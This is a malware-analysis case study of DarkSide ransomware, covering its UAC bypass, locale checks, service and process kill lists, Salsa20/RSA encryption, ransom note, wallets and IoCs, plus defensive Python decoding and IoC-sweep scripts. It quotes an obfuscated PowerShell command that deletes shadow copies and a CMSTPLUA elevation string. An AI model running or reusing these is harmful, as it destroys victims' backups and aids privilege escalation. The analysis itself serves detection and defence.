Case study

DarkSide Ransomware Does Not Attack Hospitals, Schools and Governments

DarkSide is a new ransomware family whose attacks began at the beginning of August 2020. It is supposedly run by former affiliates of other money-extorting ransomware campaigns who decided to write their own code. According to the known incidents, the ransom demanded ranges between $200,000 and $2,000,000 (US).


Like other ransomware used in targeted attacks, DarkSide not only encrypts the user’s data but also exfiltrates data from the compromised servers. But unlike Maze ransomware, which successfully attacked the Newhall School District and Fairfax County Schools in California, DarkSide has a code of conduct that implies it will not attack hospitals, schools, and government organizations.

Summary


●    Discovered in August 2020
●    Targets only English-speaking countries, while avoiding former Soviet countries
●    Does not attack hospitals, hospices, schools, universities, non-profit organizations, or government agencies
●    Uses Salsa20 with a custom matrix and RSA-1024 for encryption
●    Ransoms range from $200,000 to $2,000,000

 

UAC bypassing via COM interface


To elevate privileges, DarkSide tries to bypass UAC by using the CMSTPLUA COM interface.
Some older COM interfaces can be elevated without a UAC prompt, so this weakness is commonly used by malware to obtain administrator rights. Fortunately, it is patched on Windows 10, where the UAC prompt is shown. The code is available on GitHub: https://gist.github.com/api0cradle/d4aaef39db0d845627d819b2b6b30512
 

To bypass UAC, DarkSide calls the CoGetObject() function passing the following decrypted string as an argument:


Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
 

Locale check


Using the GetSystemDefaultUILanguage() and GetUserDefaultLangID() functions, DarkSide checks the machine's language settings so that systems located in former Soviet countries are not encrypted.

 

The whitelist contains languages from 17 countries (Windows language identifiers, in hexadecimal):


●    Russian - 419
●    Ukrainian - 422
●    Belarusian - 423
●    Tajik - 428
●    Armenian - 42B
●    Azerbaijani (Latin) - 42C
●    Georgian - 437
●    Kazakh - 43F
●    Kyrgyz (Cyrillic) - 440
●    Turkmen - 442
●    Uzbek (Latin) - 443
●    Tatar - 444
●    Romanian (Moldova) - 818
●    Russian (Moldova) - 819
●    Azerbaijani (Cyrillic) - 82C
●    Uzbek (Cyrillic) - 843
●    Arabic (Syria) - 2801

Logging


Once started, DarkSide creates a log file called ‘LOG.{userid}.TXT’, in which it records each step of its execution.

The logged data looks as follows:

To be more stealthy, the ransomware empties the Recycle Bin without calling the SHEmptyRecycleBinA() function. Instead, it removes the files and folders in the Recycle Bin one by one.

DarkSide uninstalls the following services related to security and backup solutions:
vss sql svc memtas mepocs sophos veeam backup 

After uninstalling the Volume Shadow Copy Service (VSS), DarkSide deletes existing shadow copies by launching the following obfuscated PowerShell command:

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

After deobfuscation, the PowerShell command looks as follows:
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
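To triage a command line of this shape without executing it, the following Python script (an added example; it is not code from the article or from the DarkSide sample) reproduces the launcher's hex-pair loop: it extracts the range bound and the hex literal, decodes exactly the bytes the loop would decode, and flags the result if it references shadow copy deletion via Win32_Shadowcopy. The function names and the marker list are my own; the hex literal embedded in the test input is the one quoted above.

```python
import re
from typing import Optional

# Constructed test input: the obfuscated command quoted in the write-up.
OBFUSCATED_COMMAND = (
    "powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+"
    "'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20"
    "466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'"
    ".Substring(2*$_,2))};iex $s\""
)

# Launcher shape: (0..N)|%{$s+=[char][byte]('0x'+'<hex>'.Substring(2*$_,2))};iex $s
LAUNCHER_RE = re.compile(
    r"\(0\.\.(?P<last>\d+)\)\|%\{\$s\+=\[char\]\[byte\]\('0x'\+'"
    r"(?P<hex>[0-9A-Fa-f]+)'\.Substring\(2\*\$_,2\)\)\};iex \$s"
)

# Substrings whose joint presence in the decoded script indicates shadow copy deletion
SHADOW_COPY_MARKERS = ("Win32_Shadowcopy", "Delete")


def deobfuscate_hex_launcher(command: str) -> Optional[str]:
    """Rebuild the script the launcher feeds to iex, or return None if the
    command does not follow the hex-pair launcher pattern."""
    match = LAUNCHER_RE.search(command)
    if match is None:
        return None
    last = int(match.group("last"))
    hexdata = match.group("hex")
    chars = []
    # The loop body runs for $_ = 0 .. last, so only the first last+1 byte
    # pairs are decoded; any trailing hex beyond that never reaches iex.
    for i in range(last + 1):
        pair = hexdata[2 * i:2 * i + 2]
        if len(pair) < 2:
            break  # loop bound exceeds the literal; Substring would throw here
        chars.append(chr(int(pair, 16)))
    return "".join(chars)


def flags_shadow_copy_deletion(decoded_script: str) -> bool:
    """True when every marker appears in the decoded script."""
    return all(marker in decoded_script for marker in SHADOW_COPY_MARKERS)


def triage(command: str) -> dict:
    """Summarise a command line: decoded payload (if any) and verdict."""
    decoded = deobfuscate_hex_launcher(command)
    return {
        "obfuscated": decoded is not None,
        "decoded": decoded,
        "shadow_copy_deletion": decoded is not None and flags_shadow_copy_deletion(decoded),
    }


if __name__ == "__main__":
    result = triage(OBFUSCATED_COMMAND)
    print("decoded script      :", result["decoded"])
    print("deletes shadow copies:", result["shadow_copy_deletion"])
```

The decoder deliberately mirrors the loop bound rather than decoding the whole literal: the quoted hex holds 63 bytes, but the `(0..61)` range only ever builds 62 characters, so the trailing space is dropped and the reconstructed script is exactly the one shown above.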

The last step before encryption is to terminate processes that may hold the user's data files open:
sql
oracle
ocssd
dbsnmp
synctime
agntsvc
isqlplussvc
xfssvccon
mydesktopservice
ocautoupds
encsvc
firefox
tbirdconfig
mydesktopqos
ocomm
dbeng50
sqbcoreservice 
excel
infopath
msaccess
mspub
onenote
outlook
powerpnt
steam
thebat
thunderbird
visio
winword
wordpad
notepad

 

But DarkSide does not touch system and TeamViewer processes:


vmcompute.exe
vmms.exe
vmwp.exe
svchost.exe
TeamViewer.exe
explorer.exe

The list includes TeamViewer, a remote desktop application. Leaving it running suggests the attackers intend to access the victim's computer again later.

Encryption


Encryption starts with generating a user id, which is later added to each file name. To construct the user id, DarkSide retrieves the victim's network adapter information using GetAdaptersInfo.
 

It computes CRC32 five times over the six bytes of the adapter's MAC address, with an initial value of 0xDEADBEEF.

Several XOR passes follow: the first XORs with a stride of eight bytes, the second with a stride of four, ending at the fourth byte.

Let us proceed to the encryption process itself. 

DarkSide's encryption is implemented using I/O completion ports to speed up the encryption process. It first calls CreateIoCompletionPort with NumberOfConcurrentThreads set to 0, but then creates eight worker threads by itself.
 

To queue a file on the I/O completion port, it uses the PostQueuedCompletionStatus function. To retrieve a file for encryption, it uses the GetQueuedCompletionStatus function.

DarkSide calls RtlRandomEx twice, passing 0x00 as the seed parameter on the first call.
 

Using this random generator, the ransomware creates two byte arrays of 32 and 24 bytes. It builds a 64-byte block by placing eight zero bytes between the two arrays, and treats that block as a matrix of 16 four-byte values.

DarkSide encrypts files using the Salsa20 algorithm, but with a custom matrix generated above with RtlRandomEx.

The master public RSA-1024 key is embedded into the ransomware code and is 80 bytes in size. It is used to encrypt the Salsa matrix. 

After the file is encrypted, DarkSide adds the encrypted generated matrix to the file footer.

During encryption DarkSide skips the following folders, files, and file extensions:

The encrypted files appended with the unique user extension appear as follows:

Ransom note

DarkSide leaves the ransom note as ‘README.{userid}.TXT’ file with the following content:
 

 

The ransom note contains two sites:


●    http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68, which is the official DarkSide site
●    http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC, which is a personal leak page

DarkSide also specifies a Key that needs to be entered at the first site. The Key is not unique to each user, but rather seems to be unique per sample, as the value is hardcoded and encrypted in the executable.


Decryption service


The decryption service is located in the Tor network, according to the link in the ransom note:


http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
It prompts the victim to enter the user key from the ransom note to pass the security challenge.

Wallets:


BTC - bc1qena2vfl7xhc5ad7q06eeuyd563ykxmwardnt2d 
XMR - 86R5YKD3DbMTJ1mgqiYjjsVULxwcxN5h5YyJt7Sz4B2oZEpZCnGBDZY4DG293xeeZSeF6iaDJqAoRVMeQXgUNM5x3fzyZru

So far, only one company has had its data published by the attackers. The amount of published data exceeds 200 GB.

IoCs


MD5: f87a2e1c3d148a67eaeb696b1ab69133
SHA256: 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297
LOG.{userid}.TXT
README.{userid}.TXT
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
darksidedxcftmqa.onion
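The indicators above can be turned into a simple host sweep. The following Python script is an added example (not Acronis's detection logic and not part of the original write-up): it hashes file contents against the listed MD5 and SHA256 values, matches the LOG.{userid}.TXT and README.{userid}.TXT naming pattern, and looks for the two .onion hostnames inside file contents. The exact format of the userid is not given in the write-up, so the pattern accepts any run of characters without a dot (an assumption); the sample entries in the block are constructed.

```python
import hashlib
import re
from pathlib import Path
from typing import Iterable, Iterator, List, Optional, Tuple

# Indicators quoted in the write-up
DARKSIDE_MD5 = "f87a2e1c3d148a67eaeb696b1ab69133"
DARKSIDE_SHA256 = "9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297"
DARKSIDE_ONION_HOSTS = ("darksidfqzcuhtk2.onion", "darksidedxcftmqa.onion")

# LOG.{userid}.TXT and README.{userid}.TXT. The userid format is not documented,
# so any run of characters without a dot is accepted (assumption).
NOTE_NAME_RE = re.compile(r"^(LOG|README)\.([^.]+)\.TXT$", re.IGNORECASE)

Finding = Tuple[str, str]  # (indicator type, file name)


def classify_filename(name: str) -> Optional[str]:
    """'log' or 'ransom_note' for DarkSide-style artefact names, else None."""
    match = NOTE_NAME_RE.match(name)
    if match is None:
        return None
    return "log" if match.group(1).upper() == "LOG" else "ransom_note"


def hash_matches(data: bytes) -> bool:
    """True if the content hashes to either published sample hash."""
    return (hashlib.md5(data).hexdigest() == DARKSIDE_MD5
            or hashlib.sha256(data).hexdigest() == DARKSIDE_SHA256)


def onion_references(data: bytes) -> List[str]:
    """Ransom-note hostnames found inside the file content."""
    text = data.decode("utf-8", errors="ignore")
    return [host for host in DARKSIDE_ONION_HOSTS if host in text]


def scan_entries(entries: Iterable[Tuple[str, bytes]]) -> List[Finding]:
    """Apply every indicator to (file name, content) pairs."""
    findings: List[Finding] = []
    for name, data in entries:
        kind = classify_filename(name)
        if kind is not None:
            findings.append((kind, name))
        if hash_matches(data):
            findings.append(("hash_match", name))
        if onion_references(data):
            findings.append(("onion_reference", name))
    return findings


def read_tree(root: Path, max_bytes: int = 50 * 1024 * 1024) -> Iterator[Tuple[str, bytes]]:
    """Yield (name, content) for regular files under root, skipping very large ones."""
    for path in root.rglob("*"):
        if path.is_file() and path.stat().st_size <= max_bytes:
            try:
                yield path.name, path.read_bytes()
            except OSError:
                continue


# Constructed sample entries standing in for a directory listing
SAMPLE_ENTRIES = [
    ("README.1a2b3c4d.TXT", b"http://darksidfqzcuhtk2.onion/ (constructed note text)"),
    ("LOG.1a2b3c4d.TXT", b"(constructed log text)"),
    ("quarterly_report.docx", b"ordinary document content"),
]

if __name__ == "__main__":
    # Replace SAMPLE_ENTRIES with read_tree(Path("C:/Users")) to sweep a real tree.
    for kind, name in scan_entries(SAMPLE_ENTRIES):
        print(f"{kind:16} {name}")
```

Hash matching only catches the exact sample listed here; the file-name pattern and the .onion hostnames are the indicators that survive a rebuilt binary, which is why the sweep reports each of them separately.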

Detection by Acronis


The antimalware technology integrated in Acronis Cyber Protect successfully blocks DarkSide and restores the encrypted files.